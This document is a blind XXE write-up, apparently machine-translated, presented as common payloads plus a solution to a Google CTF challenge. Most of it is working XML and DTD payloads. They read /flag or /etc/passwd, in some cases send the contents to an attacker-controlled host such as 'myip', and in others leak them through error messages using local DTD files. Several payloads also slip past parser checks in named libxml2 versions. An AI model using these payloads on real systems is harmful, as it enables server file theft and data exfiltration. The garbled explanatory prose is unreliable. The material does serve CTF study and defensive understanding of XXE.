0x01 posted the source address
Blind XXE Detailed analysis of a question with Google CTF
0x02 posted common payload
A, Blind XXE
1, externalDTD
(1) to add the following in your server DTDfiles
xml.dtd
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://myip:10001/?%file;'>">
%start;
Then the data request is the following (with phpdata encoding protocol is transmitted base64)
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://myip/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
%remote;
%send;
]>
<message>1234</message>
2, local DTD file
ubuntuThe system comes /usr/share/yelp/dtd/docbookx.dtdin part
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % ISOamso '
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://myip/?%file;'>">
%eval;
%send;
'>
%remote;
]>
<message>1234</message>
Second, based on an error of Blind XXE
Based on the principles given and OOBthe like, OOBthrough a url outer configuration data out of the tape, and is configured based on a false error urland leaked contents of the file on urlthe data returned by this way.
So and OOBmanner of construction almost only urldifferent, exactly the same elsewhere.
1, by introducing a server file
xml.dtd
<!ENTITY % start "<!ENTITY % send SYSTEM 'file:///hhhhhhh/%file;'>">
%start;
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://blog.szfszf.top/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
%remote;
%send;
]>
<message>1234</message>
2, by introducing a local file
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % ISOamso '
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'file://hhhhhhhh/?%file;'>">
%eval;
%send;
'>
%remote;
]>
<message>1234</message>
0x03 google CTF
First with burpsuite get caught
here found the problem, based on jsonthe webapplication, and sometimes can also be sent xml, we will jsonchange xml, and then sendpayload
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % para1 SYSTEM "file:///flag">
<!ENTITY % ISOamso '
<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM 'file:///%para1;'>">
%para2;
'>
%remote;
]>
<message>10</message>
But I found that if I do not refer to external DTD files directly through the nesting parameter entities, This question can also do it.
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY % para1 SYSTEM "file:///flag">
<!ENTITY % para '
<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM 'file:///%para1;'>">
%para2;
'>
%para;
]>
<message>10</message
0x04 interesting discovery
I found that, although W3Cthe agreement is not allowed in a parameter entity referenced in an internal entity declaration, but a lot of XMLthe parser does not perform well this check. Almost all XMLparser found that the following two nested
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://myip/?%file;'>">
%start;
%send;
]>
<message>10</message>
But for three nested parameter entity constructed payload Some XML parser can not be detected, such as my two combinations of this test php7.2 + libxml2 2.9.4version and php5.4 + libxml2 2.9.1are effectively utilized
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY % para1 SYSTEM "file:///flag">
<!ENTITY % para '
<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM 'file:///%para1;'>">
%para2;
'>
%para;
]>
<message>10</message>
This means that, without reference to an external dtd can be achieved Blind XXE.
